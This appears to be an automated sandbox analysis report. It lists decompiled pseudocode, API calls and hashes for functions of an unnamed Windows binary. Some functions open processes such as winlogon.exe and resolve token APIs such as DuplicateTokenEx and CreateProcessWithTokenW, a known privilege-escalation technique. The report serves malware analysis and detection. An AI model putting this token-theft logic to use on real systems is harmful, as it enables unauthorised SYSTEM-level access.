                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                                                          			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                                                                                                                                                          0x00405b81
                                                                                                                                                                                                                          0x00405b88
                                                                                                                                                                                                                          0x00405b8a
                                                                                                                                                                                                                          0x00405b8a
                                                                                                                                                                                                                          0x00405b8f
                                                                                                                                                                                                                          0x00405b96
                                                                                                                                                                                                                          0x00405b9b
                                                                                                                                                                                                                          0x00405bad
                                                                                                                                                                                                                          0x00405bad
                                                                                                                                                                                                                          0x00405b9d
                                                                                                                                                                                                                          0x00405b9d
                                                                                                                                                                                                                          0x00405ba8
                                                                                                                                                                                                                          0x00405bab
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405bab
                                                                                                                                                                                                                          0x00405be9
                                                                                                                                                                                                                          0x00405be9
                                                                                                                                                                                                                          0x00405baf
                                                                                                                                                                                                                          0x00405bb1
                                                                                                                                                                                                                          0x00405ce2
                                                                                                                                                                                                                          0x00405ce2
                                                                                                                                                                                                                          0x00405bb7
                                                                                                                                                                                                                          0x00405bbd
                                                                                                                                                                                                                          0x00405bf6
                                                                                                                                                                                                                          0x00405c4b
                                                                                                                                                                                                                          0x00405c4c
                                                                                                                                                                                                                          0x00405c52
                                                                                                                                                                                                                          0x00405c53
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405bf8
                                                                                                                                                                                                                          0x00405c02
                                                                                                                                                                                                                          0x00405c0e
                                                                                                                                                                                                                          0x00405c13
                                                                                                                                                                                                                          0x00405c18
                                                                                                                                                                                                                          0x00405c2c
                                                                                                                                                                                                                          0x00405c2e
                                                                                                                                                                                                                          0x00405c3b
                                                                                                                                                                                                                          0x00405c3c
                                                                                                                                                                                                                          0x00405c42
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c1a
                                                                                                                                                                                                                          0x00405c25
                                                                                                                                                                                                                          0x00405c2a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c2a
                                                                                                                                                                                                                          0x00405c18
                                                                                                                                                                                                                          0x00405bbf
                                                                                                                                                                                                                          0x00405bc0
                                                                                                                                                                                                                          0x00405bcd
                                                                                                                                                                                                                          0x00405bce
                                                                                                                                                                                                                          0x00405bd7
                                                                                                                                                                                                                          0x00405c58
                                                                                                                                                                                                                          0x00405c5f
                                                                                                                                                                                                                          0x00405c61
                                                                                                                                                                                                                          0x00405c61
                                                                                                                                                                                                                          0x00405c63
                                                                                                                                                                                                                          0x00405cdb
                                                                                                                                                                                                                          0x00405cdb
                                                                                                                                                                                                                          0x00405c65
                                                                                                                                                                                                                          0x00405c65
                                                                                                                                                                                                                          0x00405c74
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405c84
                                                                                                                                                                                                                          0x00405c8a
                                                                                                                                                                                                                          0x00405c8d
                                                                                                                                                                                                                          0x00405c99
                                                                                                                                                                                                                          0x00405caf
                                                                                                                                                                                                                          0x00405cbd
                                                                                                                                                                                                                          0x00405cc8
                                                                                                                                                                                                                          0x00405cd4
                                                                                                                                                                                                                          0x00405cd9
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405cd9
                                                                                                                                                                                                                          0x00405c74
                                                                                                                                                                                                                          0x00405c63
                                                                                                                                                                                                                          0x00405ce6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                                                                                                                            • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                                                                                                                            • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                          • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                                                                          • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                                                                                                                          0x00401e59
                                                                                                                                                                                                                          0x00401e5c
                                                                                                                                                                                                                          0x00401e64
                                                                                                                                                                                                                          0x00401e67
                                                                                                                                                                                                                          0x00401ef9
                                                                                                                                                                                                                          0x00401e6d
                                                                                                                                                                                                                          0x00401e70
                                                                                                                                                                                                                          0x00401e76
                                                                                                                                                                                                                          0x00401e79
                                                                                                                                                                                                                          0x00401e7e
                                                                                                                                                                                                                          0x00401e83
                                                                                                                                                                                                                          0x00401e92
                                                                                                                                                                                                                          0x00401e85
                                                                                                                                                                                                                          0x00401e8e
                                                                                                                                                                                                                          0x00401e8e
                                                                                                                                                                                                                          0x00401e96
                                                                                                                                                                                                                          0x00401ee6
                                                                                                                                                                                                                          0x00401e98
                                                                                                                                                                                                                          0x00401e9b
                                                                                                                                                                                                                          0x00401e9e
                                                                                                                                                                                                                          0x00401ea3
                                                                                                                                                                                                                          0x00401ea8
                                                                                                                                                                                                                          0x00401ebb
                                                                                                                                                                                                                          0x00401eaa
                                                                                                                                                                                                                          0x00401eb7
                                                                                                                                                                                                                          0x00401eb7
                                                                                                                                                                                                                          0x00401ebf
                                                                                                                                                                                                                          0x00401ed3
                                                                                                                                                                                                                          0x00401ec1
                                                                                                                                                                                                                          0x00401ec7
                                                                                                                                                                                                                          0x00401ec9
                                                                                                                                                                                                                          0x00401ec9
                                                                                                                                                                                                                          0x00401ed8
                                                                                                                                                                                                                          0x00401ed8
                                                                                                                                                                                                                          0x00401eeb
                                                                                                                                                                                                                          0x00401eeb
                                                                                                                                                                                                                          0x00401f01

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                                                                                                                            • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                                                                                                                            • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                                                                                                                          • String ID: winlogon.exe
                                                                                                                                                                                                                          • API String ID: 1315556178-961692650
                                                                                                                                                                                                                          • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                                                                          • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                          			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                                                                                                                                                                          0x00405241
                                                                                                                                                                                                                          0x00405250
                                                                                                                                                                                                                          0x00405257
                                                                                                                                                                                                                          0x0040525f
                                                                                                                                                                                                                          0x00405262
                                                                                                                                                                                                                          0x00405265
                                                                                                                                                                                                                          0x00405268
                                                                                                                                                                                                                          0x0040526f
                                                                                                                                                                                                                          0x0040526f
                                                                                                                                                                                                                          0x00405277
                                                                                                                                                                                                                          0x00405277
                                                                                                                                                                                                                          0x0040527a
                                                                                                                                                                                                                          0x0040527f
                                                                                                                                                                                                                          0x00405284
                                                                                                                                                                                                                          0x00405285
                                                                                                                                                                                                                          0x00405291
                                                                                                                                                                                                                          0x00405296
                                                                                                                                                                                                                          0x004052a9
                                                                                                                                                                                                                          0x004052b3
                                                                                                                                                                                                                          0x004052b7
                                                                                                                                                                                                                          0x004052bc
                                                                                                                                                                                                                          0x004052ca
                                                                                                                                                                                                                          0x004052d2
                                                                                                                                                                                                                          0x004052d5
                                                                                                                                                                                                                          0x004052d8
                                                                                                                                                                                                                          0x004052d8
                                                                                                                                                                                                                          0x004052db
                                                                                                                                                                                                                          0x004052db
                                                                                                                                                                                                                          0x004052e1
                                                                                                                                                                                                                          0x004052e4
                                                                                                                                                                                                                          0x004052e8
                                                                                                                                                                                                                          0x004052f2

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                                                          • API String ID: 3979103747-1363028141
                                                                                                                                                                                                                          • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                                                                          • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                          			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                                                                                                                                          0x00406157
                                                                                                                                                                                                                          0x0040616d
                                                                                                                                                                                                                          0x00406174
                                                                                                                                                                                                                          0x0040617f
                                                                                                                                                                                                                          0x00406185
                                                                                                                                                                                                                          0x00406196
                                                                                                                                                                                                                          0x0040619e
                                                                                                                                                                                                                          0x004061b6
                                                                                                                                                                                                                          0x004061bd
                                                                                                                                                                                                                          0x004061d4
                                                                                                                                                                                                                          0x004061da
                                                                                                                                                                                                                          0x004061e0
                                                                                                                                                                                                                          0x004061e5
                                                                                                                                                                                                                          0x004061e6
                                                                                                                                                                                                                          0x004061ef
                                                                                                                                                                                                                          0x004061f9
                                                                                                                                                                                                                          0x004061ff
                                                                                                                                                                                                                          0x004061ef
                                                                                                                                                                                                                          0x00406206

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                          • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                                                                          • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                          			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                                                                                                                          0x00404706
                                                                                                                                                                                                                          0x00404714
                                                                                                                                                                                                                          0x0040471c
                                                                                                                                                                                                                          0x00404721
                                                                                                                                                                                                                          0x0040472b
                                                                                                                                                                                                                          0x00404733
                                                                                                                                                                                                                          0x00404735
                                                                                                                                                                                                                          0x00404735
                                                                                                                                                                                                                          0x00404733
                                                                                                                                                                                                                          0x00404751
                                                                                                                                                                                                                          0x00404780
                                                                                                                                                                                                                          0x00404753
                                                                                                                                                                                                                          0x0040475e
                                                                                                                                                                                                                          0x00404766
                                                                                                                                                                                                                          0x0040476c
                                                                                                                                                                                                                          0x00404770
                                                                                                                                                                                                                          0x00404770
                                                                                                                                                                                                                          0x0040478a

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00404756
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404766
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00404780
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                          • String ID: netmsg.dll
                                                                                                                                                                                                                          • API String ID: 2767993716-3706735626
                                                                                                                                                                                                                          • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                                                                                                                          • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                                                                                                                          0x0040598b
                                                                                                                                                                                                                          0x0040598b
                                                                                                                                                                                                                          0x0040599a
                                                                                                                                                                                                                          0x004059ae
                                                                                                                                                                                                                          0x004059b5
                                                                                                                                                                                                                          0x004059c1
                                                                                                                                                                                                                          0x004059c6
                                                                                                                                                                                                                          0x004059cb
                                                                                                                                                                                                                          0x004059ce
                                                                                                                                                                                                                          0x00405a7b
                                                                                                                                                                                                                          0x00405a7b
                                                                                                                                                                                                                          0x004059d4
                                                                                                                                                                                                                          0x004059d4
                                                                                                                                                                                                                          0x004059dc
                                                                                                                                                                                                                          0x004059ee
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004059f0
                                                                                                                                                                                                                          0x004059f0
                                                                                                                                                                                                                          0x004059f6
                                                                                                                                                                                                                          0x004059f7
                                                                                                                                                                                                                          0x004059fa
                                                                                                                                                                                                                          0x00405a03
                                                                                                                                                                                                                          0x00405a2b
